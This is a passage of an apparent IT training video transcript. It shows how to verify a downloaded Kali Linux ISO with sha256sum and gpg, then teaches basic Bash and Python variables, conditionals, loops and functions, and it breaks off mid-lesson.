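xxd -l 16 /bin/ls        # a Linux ELF executable starts with 7f 45 4c 46 ("\x7fELF")
xxd -l 8 picture.png     # a PNG image starts with 89 50 4e 47 0d 0a 1a 0a

# The file utility identifies formats by these same signatures.
file /bin/ls picture.png
```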
Learn how to verify the integrity of a downloaded file based on its hash value.
Objectives
[Video description begins] Topic title: Verifying Downloaded Files. Your host for the session is Steve
Scott. [Video description ends]
In this video, I'll demonstrate how to verify the integrity of a downloaded file based on its hash value.
[Video description begins] A terminal window opens. The command prompt is:
steve@vm1:~/Documents/verifying_downloaded_files$. [Video description ends]
The way this is accomplished is that we produce a signature based on the data that we're putting into a hash
function. So we take the file, we put it through this hash function, and it produces a signature of fixed size. In
the case of this video, we're going to use a 256-bit signature. So this is a way of validating the integrity and
authenticity of a file. So let's have a look in the current folder in this verifying_downloaded_files folder I have.
So I'll do ls -l, and there's four files in here now. One is a bash script called download_kali_files.
So, if we do cat of download_kali_files, we see that there's some curl statements. There's one that downloads
an iso image to install kali-linux and then there's two other files. There's the SHA256SUMS.gpg and SHA256SUMS. So these are the files that we can use to verify the signature. So the person who created this iso image created a signature of it, using the image itself. Now, the image file, this ISO file, is a very large file. If we wanted to know the exact size, we can do ls -lah. And this file is 2.8 gigabytes, so it's quite a large download.
So the person who creates the ISO image created a signature of it. Then after we download the file, we verify
that the signature that we get, by computing it ourselves using the ISO file, is the same as the creator of the
ISO image got when they ran it. Otherwise, if they're different, the integrity of the download may have failed
either by transmission error or by a tampering attack. Possibly due to a man-in-the-middle attack which
modified the file in transmission.
So we should always verify our downloads. So, I've already predownloaded the files by running the
download_kali_files Bash script. It's a 2.8 gigabyte file, so it would take some time to download, so I wouldn't
want to do it during the course of the video. But after that file is run and we've downloaded the ISO image and
its signature, so we can calculate it by running sha256sum on the kali-linux ISO file. And it should take a few
moments, but it'll give us this long hexadecimal value that we can use to verify it with.
So here it gives us the hexadecimal value and the name of the file. So the way to do this is if we do a cat of
SHA256SUMS, we can see that there's this kali-linux-2020.1-live-amd64.iso that matches what we have that
we generated. Now, there's a quicker way to do this, we don't have to eyeball it or cut and paste it and line it up. We can just use grep. I can do a grep of kali-linux-2020 and SHA256SUMS, and we'll pipe that into sha256sum, the actual program, with -c.
So you can think of -c as check: it will find the file's entry within what we pipe in, compute the hash, and compare. And
when it finds it, it should give us an OK, and it does. So the signatures match, but there's a little bit of a
problem here. In the download, if I do a cat of download_kali_files, you'll notice that all of the transfers were
done over HTTP. Ideally, you'd prefer to download the iso image over HTTPS as well as the signature files.
That will limit the attack surface, at least in terms of a man-in-the-middle attack. So now to verify it, we're
going to use HTTPS and get the GPG key from Kali Linux, so from kali.org. So I'll do curl of
https://www.kali.org/archive-key.asc and we'll pipe that into gpg --import. So we've imported the key, now
let's check its fingerprint. So gpg --fingerprint. And then we can copy the key fingerprint, paste it. So now we
have our fingerprint. Now, using this we can verify that our SHA256SUMS the actual signatures we have, are
valid. So we can do, gpg --verify, and SHA256SUMS.gpg and SHA256SUMS.
[Video description begins] A few gpg output appears. [Video description ends]
So what we're looking for here is good signature. So a good signature from Kali Linux Repository
<devel@kali.org>. So this is what we're expecting to get. So we've successfully verified the signature. And
that concludes this demonstration of verifying downloaded files.
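Putting the whole check together, the commands from this demo are roughly the following, assuming the ISO and the SHA256SUMS files are already in the current folder:

```bash
# Compute the hash of the downloaded ISO.
sha256sum kali-linux-2020.1-live-amd64.iso

# Find the matching entry in the published sums file and let sha256sum check it.
grep kali-linux-2020 SHA256SUMS | sha256sum -c

# Import the Kali signing key over HTTPS, then verify the sums file itself.
curl https://www.kali.org/archive-key.asc | gpg --import
gpg --fingerprint
gpg --verify SHA256SUMS.gpg SHA256SUMS
```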
14. Video: Course Summary (it_cypgsodj_02_enus_14)
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined how to identify code used in security applications and exploits for a number
of different programming languages including Python, C, C++, and SQL. We did this by exploring common
programming paradigms and their features. How to identify Bash and Python scripts. The elements of a
common C and C++ program. The similarities and differences of C# compared to the C and C++ languages.
Regular expressions in typical regex engines. And how to identify PowerShell scripts and the elements of a
SQL statement.
Common security vulnerabilities in code that can lead to exploits. Executable formats based on their binary
signatures. And how to verify the integrity of a downloaded file based on its hash value. In our next course,
we'll move on to explore the elements used in common Bash and Python scripts, including how to use these elements in basic scripts.
Objectives
[Video description begins] Topic title: Course Overview [Video description ends]
[Video description begins] Your host for this session is Steve Scott. He is an IT consultant. [Video description
ends]
I've been an IT consultant for almost a quarter of a century. I've traveled around the globe to serve clients, responsible for building software architectures, hiring development teams, and solving complex problems through code. With my toolbox of languages, platforms, frameworks, and APIs, I round out my coding experience with a formal background in mathematics and computer science from Mount Allison University.
In this course, we're going to explore Bash and Python scripts, including how to work with some of the
common statements and loops used in these scripting languages. I'll start by examining the elements in a
scripting language as compared to a full fledged computer program. I'll then demonstrate how to use and set
variables and use conditional statements in Bash scripts. Next, I'll show you how to use the for, while, and until
looping statements, and create custom functions in Bash scripts.
I'll continue with the Python scripting language and demonstrate how to work with variables, conditional
statements, and the for and while loop statements in Python scripts. I'll then show how to create custom
functions and import external modules in Python scripts. Lastly, I'll demonstrate how to perform file
operations and make URL requests in Python scripts.
After completing this video, you will be able to describe the elements that make up a scripting language as
opposed to a full-fledged computer program.
Objectives
describe the elements that make up a scripting language in contrast to a full-fledged computer
program
[Video description begins] Topic title: Introduction to Scripting. Your host for this session is Steve
Scott. [Video description ends]
In this video, I'll describe the elements that make up a scripting language. In contrast to a full-fledged
computer program and general-purpose programming. So what is scripting? And what defines our general idea
of a scripting language as opposed to a general-purpose programming language? How are they used? And what
class of problems do they address? Well, a scripting language, it's not so much the language itself.
Even though some languages like Java or C++ and C# are rarely thought of as scripting tools. It's best to think
of scripting as a property of a language. A language like Python or JavaScript can be used for scripting and for
general-purpose programming of larger more comprehensive applications. So what are some common
properties of scripts? Well, they're often purpose built for accomplishing a single task. And they're often small
programs written in a single file, or even written on a single line of code within the file.
Often in the form of a long one liner compound statement. They require fewer declarative statements. And
scripts are most often interpreted. Whereas large programs are more often compiled, both in the case of
machine-compiled or byte-compiled, like Java. They're often used interactively. So they have text-based
prompts that make repetitive tasks less tedious. With stops to allow a user to enter yes or no or small inputs
where options are needed. They're more frequently written by users rather than by software developers.
For the automation of tasks and scheduling tasks and having some control over typical jobs that are done on a
computer. And they're usually built-in. Shell scripts like Bash or languages like AWK, Perl, and even Python
are installed by default on many systems. What are some examples of common tasks for scripts on a server?
Well, we have backup procedures. So performing backups such as archiving old data or older log files, so that
we can aggregate them and analyze them. We often monitor for significant events, and we have event notifications.
So automated emails or text messages or alerts of some kind that alert a system administrator or developer of
some software application. We do summary computations, such as creating reports and statistical summaries,
calculating sums and averages. Now what are some areas that scripting languages are typically best at? Well, basic automation, simplifying repetitive steps. Anytime you find yourself repeating the same
commands over and over again, it's a prime target for automating. Even things in graphical applications and
documents and spreadsheets. Simple yet manually intensive tasks that take up time. Such as word
substitutions, cutting and pasting, file renaming and copying, and aggregating data from within files.
Quite often we find ourselves with manual tasks like this that take up time, say 30 minutes every few days.
And over the course of a year, that can really add up. So there's typically an upfront cost in time, say a few
hours or a few days, to write a script that automates a task. But that investment pays off pretty quickly in the
time saved in the long run. That's what computing is really all about. We can also apply this to periodic jobs.
Then not only do we automate tasks, we run them on a schedule: at a particular day of the week or time of day, or even every hour if that's needed, or even every few minutes. Every operating system has a task scheduler of some sort, like crontab on Unix-based systems, that we can use to run scripts when you need them to perform their task. And that concludes this presentation on scripting.
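As a minimal sketch of that scheduling idea, a crontab entry on a Unix-based system might look like this (the backup script path is a hypothetical placeholder):

```bash
# List the current user's scheduled jobs.
crontab -l

# Example entry, added with `crontab -e`: run a backup script every day at 02:30.
# 30 2 * * * /home/steve/scripts/backup.sh
```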
[Video description begins] Topic title: Bash Variables. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to use and set variables in a bash script. And I'll cover some important built-
in variables.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder, I have a file called variable. This is a bash script. So I'm going to open it with nano. So
nano of variable. And here I have the code. So I start with the usual bash shebang at the beginning of the code
with #!/bin/bash. And then we get on to simple variable assignment. So I have the first variable called name. I
set it equal to the string Steve with the string enclosed in double quotes. Then I assign two numeric variables, a
= 1 and b = 2. Now let's see what we can do with it.
Well, we can do some simple concatenation either by embedding a string into a literal string. So I have echo
and in double-quotes, I have the literal string Name with a colon and a space. And then to insert the name
variable inside of the string when we reference a variable, we put a dollar sign in front of it.
So I have $name. Then the next echo, I have echo of $a+$b. Now, these are numeric variables. And in many
languages, what you would get is 1+2 so the result would be 3. But in this case, in bash, it's going to
concatenate them. So we're going to get the actual string 1+2. And it's going to be echoed literally to our
console. If we want to get 1+2, get the result 3, we need to perform an arithmetic expansion.
And for that we put double parenthesis around the expression. So I've echo dollar sign double parenthesis
open. $a + $b, and then close the double parenthesis. So this should print 3 for us. When command line
arguments are passed into bash scripts there's a particular way to reference them. We can get the number of
arguments. So in this echo I have echo of the string Argument count. And then $#, which will give us the
number of arguments. We want the argument values, we use $@.
So the @ symbol. If we want to get just the first argument, we use $1. And the second argument is $2. There's
also a number of built-in variables. If we want the current file name, we use $0. The process number is $$, so
two dollar signs. If we want the time format we use $TIMEFORMAT, all in uppercase. And the Current Path
is $PWD. Now at the end of a program, if all is successful, our bash script returns 0. But we can be explicit
about it by using exit of 0. So if at some point in our program, if we got into a condition that wasn't expected
and we wanted to return a failure, we could use exit with some number other than 0.
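Here is a hedged reconstruction of the variable script as narrated; the echo labels match the output described below but aren't guaranteed to be character-for-character identical to the original:

```bash
#!/bin/bash

name="Steve"
a=1
b=2

echo "Name: $name"
echo "$a+$b"               # concatenates literally: 1+2
echo "$(($a + $b))"        # arithmetic expansion: 3

echo "Argument count: $#"
echo "Argument values: $@"
echo "First: $1"
echo "Second: $2"

echo "Current file name: $0"
echo "Process number: $$"
echo "Time format: $TIMEFORMAT"
echo "Current path: $PWD"

exit 0
```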
Now I'll exit out of this code and we'll do ./variable to run the program. Let's have a look at the results. Now
we get the name is Steve. $a + $b returned 1+2 literally. But then when we put it inside of the double
parenthesis, it performs the arithmetic expansion and we get 3. Now I didn't pass any arguments to this script.
We have Argument count: 0. So no Argument values, nor First, nor Second is set. So these are all empty.
The current file name is the ./variable so what we use to run it. The process number is 6429. Now the built-in
time format in this case is not set so we get nothing printed here. And then the current path is
/home/steve/Documents/bash_variables.
Now let's try running it again. But let's pass in a couple of arguments. Let's pass in the arguments, let's just
give it some numbers, 123 and the number 456. So in this case if we look at the Argument count we get 2, the
Argument values, 123 and 456. So the First argument is 123, and the Second is 456. And that concludes this
demonstration of bash variables.
[Video description begins] Topic title: Bash Conditionals. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to use conditional statements in a Bash script and a Bash shell.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder, in this bash_conditionals folder, I have two files: conditionals, a Bash script, and file.txt, which I'm going to use from inside the script. So now I'll open the script using nano, so nano of conditionals opens our file. And it begins the usual way, with the shebang, with #!/bin/bash. Then the first
conditional, the first if statement, is if, then I use the double brackets.
[Video description begins] The square brackets are used in this line of code. [Video description ends]
So conditionals typically fall within double brackets unless they're arithmetic conditionals, which I'll get to
next. So I've, in double brackets, -e file.txt. So you can think of -e as if exists file.txt. So return true if file
exists. If file.txt exists, otherwise it returns false and it won't get into the if block.
So after the double brackets, I have a semi colon, which is required, and the keyword then. And what comes
next is the interior of the if block. So I echo file.txt exists, just saying that the file exists if the condition is true,
then we end the if block with fi.
[Video description begins] After echo, all the strings are put inside double quotation marks. [Video description
ends]
Now the next one is an arithmetic comparison. So I have if, then double parentheses surrounding the
comparison. So I've $1, so the first argument, less than $2, the second argument. The semi colon as usual, the
key word then, and we echo inside of the if block the literal string $1 less than $2. Then an else if is just E-L-I-
F, so elif. I have double parenthesis, $1 greater than $2, close the double parenthesis, semicolon then, and then
I echo the literal strings saying that $1 is greater than $2. And then I end the elif block with fi. Now we do a
string comparison. So if, with the double brackets again, $1 != $2.
[Video description begins] The square brackets are used in this line of code. [Video description ends]
And then I close the double brackets. So this is going to compare the strings $1 and $2, even if they're numbers
it will compare them as strings. Semi colon, the key word then, and then I echo the literal string $1 != $2.
So we read that as the first argument is not equal to the second argument, else. So a pure else block, so if the
condition fails, there's an else and then I just echo $1 and $2 are the same, and then I exit one. So this is a
failure condition. So if the two arguments are the same, the script will return a failure. And I close the block as
usual with fi. Then I echo an empty space at the end if it completes successfully.
[Video description begins] After the echo and empty space, there are two double quotation marks in the last
line of code. [Video description ends]
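Before running it, here is a hedged reconstruction of the conditionals script as narrated:

```bash
#!/bin/bash

if [[ -e file.txt ]]; then
    echo "file.txt exists"
fi

if (( $1 < $2 )); then
    echo "$1 less than $2"
elif (( $1 > $2 )); then
    echo "$1 greater than $2"
fi

if [[ $1 != $2 ]]; then
    echo "$1 != $2"
else
    echo "$1 and $2 are the same"
    exit 1
fi

echo ""
```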
And then if it gets to the end without failing, it will return zero successfully. That's the default. So I'll exit the
code. Now let's run it. So we'll do ./conditionals with 1 and 2. So file.txt exists, 1 is less than 2, and 1 is not
equal to 2. Now let's try it with 2 1. File.txt exists again, of course, that hasn't changed and 2 greater than 1 is
what gets printed, and 2 not equal to 1. Now let's try something else. Let's do it with, say words, bob steve.
So we don't get the arithmetic comparison or expansion, but we get bob is not equal to steve. Now if we get the
failure condition, let's say with 1 1, it tells me the file exists again, and then it says 1 and 1 are the same, and
then it quits out. Now we can use this by chaining commands together conditionally. So if we use the double
pipe and let's say echo "ok", so what this means if the first command fails the second one will be executed. So
we get file.txt exists, 1 and 1 are the same and we get ok.
[Video description begins] In the given and subsequent commands, the string ok is put inside double quotation
marks. [Video description ends]
But if we change this to 1 2, we don't get the ok. Because conditionals of 1 2 returns zero and it's successful, so
it doesn't execute the second command. Now I can change that and put a double ampersand that if the first
command succeeds, then it executes the second. So conditionals 1 2 will succeed.
So it will echo ok at the end, and it does. But if I change it to conditionals 1 1, It fails. So the echo doesn't get
processed. So you can think of the double pipe as execute the expression on the right if the left fails, and the
double ampersand execute the expression on the right if the left is successful. And that concludes this
demonstration of Bash conditionals.
During this video, you will learn how to use the for, while, and until loops in a Bash script.
Objectives
In this video, I'll demonstrate how to use the for, while, and until loops in a bash script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder in bash_loops, I do an ls, and we have a file error.log and looping. So looping is the
bash script that we're going to execute. So I'll open this up in nano, and we'll go through the code. So it starts
as always, with the bin/bash shebang. And then my first loop is looping over a numeric range.
So I echo the literal string 1 to 10, followed by a colon, and then I create a for loop. So I have the for keyword,
so for, the loop variable, i, in and in braces I have 1.. or dot dot 10. So this is the expansion of the numbers
from 1 to 10, so it will loop over the entire range. Followed by a semicolon then the keyword do. And inside
the loop, all I do is an echo with an empty space and the variable i.
[Video description begins] Before each variable, a dollar sign is placed. [Video description ends]
And then to close the loop block, we have the keyword done. We can also loop over command line arguments.
So the arguments that are passed to this script. So I echo arguments, the literal string, and then I have another
for loop, so for a in, and in double quotes I put $@. So this is the shortcut or the built in variable that accesses
all of the arguments that are passed followed by a semicolon and the keyword do.
And then inside this loop, I just echo the loop variable with an empty space before it. So, in the string, I have a
space and then $a, and then done, the keyword to close off the loop block. Now, let's have a look at a while
loop, now this one's a little bit more involved. So I'm going to continue looping while the error.log file is not
empty. So the expectation here is that we'll continue looping until somebody addresses this log file, has a look
at it and clears it.
So the while loop has the while keyword. Since this is an arithmetic comparison, I can use the double
parenthesis instead of the double square brackets like we would in an if statement. Then $, and then an open
parenthesis, and then the function we're going to use to check the file size. So this is the stat function, so the
stat command, --format "%s", which will return the size of the file error.log.
[Video description begins] The %s string is placed inside the double quotation marks. [Video description ends]
I close the parenthesis, and check to see if this is greater than 0. I close the double parenthesis followed by a
semicolon and the do keyword. Inside this loop, I do an echo, with the literal string error.log is not
empty, clear to continue, dot dot dot and then I sleep for three seconds and check it again. And then like the for
loop, the while loop is closed off or terminated with the done keyword.
And now I have the until loop, so this loops until a particular condition is true. So while it's false, continue
looping. So while and until are very similar. So while continues while the condition is true, and until continues
while the condition is false. So in this case I have until, and then in double square brackets I have -d app.
So the -d is to check to see if a directory exists, -f checks to see if a file exists, and -e checks to see if it exists,
it can be either or. And then we close the double brackets, semicolon, the keyword do. So all loops have the
semicolon and then the do keyword. And in this case it says echo, Please create 'app' folder to proceed... And
then sleep for three seconds until it happens, and then done.
[Video description begins] The text app in the string is placed inside single quotation marks. [Video
description ends]
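Here is a hedged reconstruction of the looping script as narrated:

```bash
#!/bin/bash

echo "1 to 10:"
for i in {1..10}; do
    echo " $i"
done

echo "Arguments:"
for a in "$@"; do
    echo " $a"
done

# Keep looping while error.log is not empty.
while (( $(stat --format "%s" error.log) > 0 )); do
    echo "error.log is not empty, clear to continue..."
    sleep 3
done

# Keep looping until an 'app' directory exists.
until [[ -d app ]]; do
    echo "Please create 'app' folder to proceed..."
    sleep 3
done
```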
So now I'll exit out of this, and now I'll do ./looping. So we didn't pass any arguments, but we got the
numbers from 1 to 10 and now error.log is not empty, clear to continue. So it's going to keep showing this
message every three seconds until we clear it. So I'll switch over to another terminal window I have opened in
the same folder in this bash_loops folder. I'm going to do a cat on error.log, which says an error has occurred,
so it has something in the file.
To clear it, I'm going to use the shortcut greater than symbol, so this is the redirection. So we're redirecting
nothing to error.log, so this is going to clobber the file and set it to 0. And now if I go back, so it exited the
while loop because we emptied the log file, and now it's saying, Please create 'app' folder to proceed. So we'll
do mkdir, so make directory app, and now I've created the folder, the loop exits and our program exits.
Now let's run this one more time, and I'm going to pass some arguments to it. I'm going to say the word one
steve ok hello. And if we look at the arguments loop, we get the results, one steve ok hello, and it successfully
loops over the arguments. Our while loop and until loops don't execute because the error log is empty. So it
doesn't enter that loop and the app folder has already been created. And that concludes this demonstration of
bash loops.
In this video, you will learn how to create custom functions in a Bash script.
Objectives
[Video description begins] Topic title: Bash Functions. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to create a custom function in a bash script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder, in this bash_functions folder, I have a script called function. So I'm going to use nano of function and we'll have a look at the contents. So it begins with the regular bash shebang. And then we define
our function. So I have greet, followed by the open and close parenthesis. And then the function body is
enclosed in braces. So we have an open brace, the function body, and then the close brace after the function
completes.
So functions are treated a little bit differently in bash than they are in most other languages. We don't define the function parameters on the function itself; we access them inside the function. Arguments to a function are passed the same way arguments are passed to a script. So we have dollar sign one for the first argument, dollar sign two for the second.
And all the same built in variables we get when we're calling a script from the command line. So in this case,
dollar sign one is expected to have the greeting, and dollar sign two, expected to be the recipient. So the first
and second arguments. So we set greeting equal to dollar sign one, and recipient equal to dollar sign two. Then
I have an if statement. So I'm going to check to see if the greeting is empty. And if it's empty, I'm going to set
it to a default greeting of Hello.
[Video description begins] The square brackets are used in this line of code. [Video description ends]
So I have if [[ -z and then "$greeting", so dollar sign greeting, surrounded in double quotes. Then I close the double brackets, followed by a semicolon, the then keyword, and then I set greeting equal to Hello in the body of the if statement, and then close the if statement with fi.
[Video description begins] The string Hello is placed inside the double quotation marks. [Video description
ends]
So hyphen z is a test to see if the variable is empty. Now as I demonstrated in the video on bash conditionals, if you have a command, then a double ampersand, and another command, if the command on the left is successful, then the command on the right gets executed. Otherwise, it doesn't. So if we put double brackets around -z "$recipient", followed by the double ampersand, then recipient equals World.
[Video description begins] The square brackets are used in this line of code. The string World is placed inside
the double quotation marks. [Video description ends]
What this is saying is that if recipient is empty, then we set recipient equal to world. Otherwise, we just
continue on as normal. And now one of the other strange things about bash functions is that we don't return the
results, we don't return a value from the function. We actually echo the result. So we do echo, and in double
quotes I have greeting.
So $greeting, $recipient!, and then I return 0. So the return is actually the status code or result code of the
function. Just as we would have an exit code from a script, we have a return code from a function, and it
behaves the same way. So now if I want to call a greeting and have it output the result, I just call greet.
So I just type the command greet, with no parenthesis or anything, just the basic word greet. If I want to
capture the output, I have a variable here, greeting underscore output, and I set that equal to dollar sign and
greet in parenthesis. So instead of the function echoing the result to the standard output, it will capture the
result and save it into a variable. We can also call it directly, so I have echo $. And then in parenthesis, I have
greet with the arguments Hi Steve.
So that should print the greeting Hi Steve. But it's echoing it from the captured result and not from within the
function itself. And then I have another variable called hello_jane, and I set that equal to $ (greet Hello Jane).
And then I echo "$hello_jane". So we capture the result in a variable, and then we echo the variable. So now I'll exit out of this and run ./function. So we get Hello, World. So that was calling greet with no arguments, so we get the default result. Then we get Hi, Steve, and Hello, Jane. And that concludes this demonstration of bash functions.
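For reference, here is a hedged reconstruction of the function script walked through above:

```bash
#!/bin/bash

greet() {
    greeting=$1
    recipient=$2

    if [[ -z "$greeting" ]]; then
        greeting="Hello"
    fi
    [[ -z "$recipient" ]] && recipient="World"

    echo "$greeting, $recipient!"
    return 0
}

greet                        # prints the default: Hello, World!
greeting_output=$(greet)     # captures the output instead of printing it
echo "$(greet Hi Steve)"     # prints: Hi, Steve!
hello_jane=$(greet Hello Jane)
echo "$hello_jane"           # prints: Hello, Jane!
```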
[Video description begins] Topic title: Python Variables. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to assign basic values to variables in a Python script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder in this Python variables folder, I have a script called variables.py. Let's open this using
Nano. So the goal here is to become familiar with some of the more important or the standard data types of
Python. So I begin having the usual Python 3 shebang, so #!/usr/bin/env python3. So this will execute it as
Python 3 when executed from our Bash shell.
So I start by creating a couple of strings, so we can create strings by surrounding text in single quotes or
double-quotes. So I start with greeting = 'Hello, World!', and this is all surrounded in single quotes. Then I
have a variable called another, and I set that equal to "Hello, Earth!", surrounded in double-quotes. So these
are two valid ways of creating strings using Python.
[Video description begins] The contents to be printed are placed inside the parentheses. [Video description
ends]
And then I print their contents. So I print the greeting, and I print the variable another. And then I do an empty
print to put an empty line between our first example here with strings and our next example. So now if we go
down, I create an integer. So, and the integer, you can think of as counting numbers.
So anything positive or negative but a whole number, so 0, 1, 2, 3, 4, or 5, like this, so I set quantity, a variable
called quantity = 5. We can also do floating point numbers or decimal numbers. So I have price, and I set that
equal to 9.99. So I'm going to multiply the quantity and the price, so let's print the quantity times the price.
[Video description begins] He highlights the following line of code: print('price * quantity:
{}' .format(quantity * price)). [Video description ends]
So I'll do a print. And in single quotes I have price * quantity, as in price times quantity, a colon, and then the
open and close brace together, which will get replaced in this formatted string. So one of the functions that we
can call on a string, so we can have our string and then .format, and it's going to replace the double brace with
quantity times price. And now, since price is a float and we're multiplying it by an integer, it will use a floating
point number to display the price times the quantity.
And after I go through the code, I'll execute the program and we can see the result. And then again, I put
another empty print to put an empty line. We also have the list type. A list type is exactly what you'd expect, it's a list of things. So you can think of it as an array. So I have this list called things and I set that equal to the
list. So we create a list using square brackets, so we surround our list in square brackets, and it's a list of
strings.
So I have the string car, so it's surrounded in single quotes, followed by a comma, then bicycle comma door
comma bird. So we have these four strings in a list called things. And then I can call print on things and I will
print the contents. We will print all the items, or we can select the single item by indexing it. So lists are
indexed from 0 onward. So the first item is the 0 item, so things[0] will give us car.
[Video description begins] He highlights the following line of code: print(things[0]). [Video description ends]
Things of 1, if we index it at 1, it would give us bicycle, 2 would be door, and 3 would be bird. In this case, I'm
doing print of things and at index at 0, so 0 in square brackets. And then I do an empty print to put some space
between this example and the next one. The next example is a tuple, or tuple as some people call it, I call it a
tuple. So I set the tuple equal to a list of items, but it's surrounded in parenthesis.
So I have an open parenthesis 42 comma, 16 comma, 84, and a closed parenthesis. Now, the big difference
here is a tuple, once it's created, cannot be modified, so we can't add elements to it or take elements away like
we can with the list. So it's a fixed size with fixed elements. So I'll print the tuple, and then I'll print the tuple
index at 2, so the 2 in square brackets, which should give us 84 because it's also indexed from 0.
[Video description begins] He highlights the following line of code: print(tuple[2]). [Video description ends]
And then I put an empty print. And now, we have a dictionary. So sometimes these are called associative
arrays in general. And I set person = to the open brace with the string name : Steve.
[Video description begins] The strings are placed inside the single quotation marks. [Video description ends]
So it's like a list, but we're indexing the list based on a name or a string instead of a number. So if I index it at
name, I get Steve, or if I index it at email, I get [email protected]. So I have email : [email protected],
and then I close the brace, so this creates a dictionary. So I print person, so I print the whole dictionary.
Then I print person indexed at name, so the string name in square brackets, and then I print person indexed at email, so email in square brackets. So that's all of the code. I'm going to close by Ctrl+X-ing out of it to
exit and do ./variables.py. And we get our results. So we get Hello, World printed, Hello Earth, the price times
the quantity is 49.95, so it's five times 9.99.
We print the list of items, so we get 'car', 'bicycle', 'door', 'bird', and then indexed at zero we get 'car'. We print the tuple, 42, 16 and 84 in parentheses. And then we index it at 2, which gives us 84, and then our dictionary, 'name' : 'Steve', 'email' : [email protected]. Then our dictionary indexed at name gives us Steve and indexed at email gives us [email protected]. And that concludes this demonstration of basic Python variables and the standard data types.
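Here is a hedged reconstruction of variables.py, written out and run from the shell; the email address is a hypothetical placeholder:

```bash
cat > variables.py << 'EOF'
#!/usr/bin/env python3

greeting = 'Hello, World!'
another = "Hello, Earth!"
print(greeting)
print(another)
print()

quantity = 5
price = 9.99
print('price * quantity: {}'.format(quantity * price))
print()

things = ['car', 'bicycle', 'door', 'bird']
print(things)
print(things[0])
print()

tuple = (42, 16, 84)    # the demo names this variable tuple, which shadows the built-in type
print(tuple)
print(tuple[2])
print()

person = {'name': 'Steve', 'email': 'steve@example.com'}
print(person)
print(person['name'])
print(person['email'])
EOF

chmod +x variables.py
./variables.py
```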
[Video description begins] Topic title: Python Conditionals. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to use conditional statements in a Python script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So, in my current folder, python conditionals, I do an ls, and we see that we have a file called conditionals.py
that I've created. So open this using nano, so nano of conditionals.py. And we'll go through this simple
example. So I'm demonstrating how to use conditional statements. So if statements. So I start out with the
usual python3 shebang.
And then the first line, I have an import of random, so I'm going to generate a random value, a random number. And I'm going to use that to determine what branch of an if statement I go into. So then I create the random number, so I have the variable a to hold the random value, equal to random.randrange(5). So 5 means we want a random integer from zero to four. That's the range that randrange returns.
[Video description begins] The number 5 is placed inside the parentheses. [Video description ends]
So the first if statement, so I have if a greater than zero, so we use the greater than symbol with a colon. So we
put a colon at the end of our clause, or clauses if there's more than one. And then this is a single line if
statement. So we have if colon, and then the statement that comes after the if, so if this is true, we print a is
greater than zero, so we print the literal string saying that a is greater than zero.
[Video description begins] The string is placed inside the double quotation marks. [Video description ends]
If a is equal to zero, so a double equal sign to test equality, if that's true, so we have a colon at the end of the
statement again, but then we have our print statement on the next line. Now the body of an if statement is indented. So this indent is significant in Python: anything indented under an if statement belongs to that branch of code. So in this case, if we get a equals zero, I print, well that was unlucky.
Then I have elif, E-L-I-F, which is short for else if. So if a is not equal to zero, I say elif a modulus two, which is the percent sign, so a mod two. So we divide a by two and take the remainder of that integer division. If a is divisible by two, that remainder is equal to zero, so a mod two equals zero, the double equal sign, zero, colon. Then a is even. So we print a is even, else we print a is odd.
[Video description begins] There is a colon after else. [Video description ends]
So if a is not even, it's automatically odd. So that ends our if block. So you can have a straight if statement or if
elif or if elif else, so this is how conditional statements are done in Python. So now exit out of the code and run
./conditionals. So in this case, a is greater than zero and a is odd. Now we don't actually have a printed, we're just seeing the results. If I see well that was unlucky, we know a is zero. If we see a is greater than zero and a is even, well, we know a is either two or four. So we can run it a few times and each time we run it, we can get a different result.
But it's based on a random value. So each time we run it, we get a different value from that random generation.
Now if I run nano conditionals, I could actually put a print in, so I say print(a), so we can see what a is each time we run it. So it'll make it a little more obvious. So ./conditionals. So when a is two, a is actually greater than zero, so that's correct, and a is even. I'll run it again: for one, a is still greater than zero, but this time a is odd.
So each time I run it, if I get a is zero it prints well that was unlucky. And that concludes this demonstration of
Python conditionals.
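Here is a hedged reconstruction of conditionals.py, including the print(a) added near the end of the demo:

```bash
cat > conditionals.py << 'EOF'
#!/usr/bin/env python3
import random

a = random.randrange(5)    # random integer from 0 to 4
print(a)

if a > 0: print("a is greater than zero")

if a == 0:
    print("well that was unlucky")
elif a % 2 == 0:
    print("a is even")
else:
    print("a is odd")
EOF

chmod +x conditionals.py
./conditionals.py
```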
In this video, you will learn how to use the for and while loops in a Python script.
Objectives
[Video description begins] Topic title: Python Loops. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to use the for and while loops in a Python script.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder, I have a file called loops.py. I'll open it and we'll have a look at the contents. So again,
we have a Python script that starts with the usual Python 3 shebang. And then I set some values. So I create a
list called values and I set that equal to in square brackets the values 1, 33 and 66. So we have a list of integers.
Then for i in values, I print i. So the syntax for a for loop is for some loop variable in some values.
[Video description begins] This line of code ends with a colon. [Video description ends]
So in this for loop, we're just going to print the values so one at a time. So on each line, we'll print 1, 33, and
66. Now let's try a while loop. So I'm going to create two variables total = 0 and loop = 0. So we initialize
these both to 0. And this while loop is going to continue while total is less than 100.
[Video description begins] This line of code ends with a colon. [Video description ends]
[Video description begins] He highlights the following line of code: total += values[loop]. [Video description
ends]
Then on each iteration of the loop, so each time the loop repeats, it will increment loop so loop += 1. So loop
will start out as 0, 1, and then 2. Now, there's a bit of a danger here. If the values don't total up to at least 100,
then this loop will be an infinite loop and it will never stop. We can put in a logical and, so total less than 100 and loop is less than or equal to 2. So if loop reaches three and we reach the end of the values, we'll also exit the
loop.
So this is a safer way of performing this function. So if we hit 100 before we reach the end of the values, we
exit the loop. Or if we reach the end of the loop and we haven't reached a total of 100 or more we also exit the
loop.
So there's no chance of getting into an infinite loop situation here. We can also do an infinite loop to begin
with, but break out of it on another condition. So I have while True so this loop will continue forever. So while
True then the colon, then indented I have the body of the loop. So I have val = input, then with this string Enter
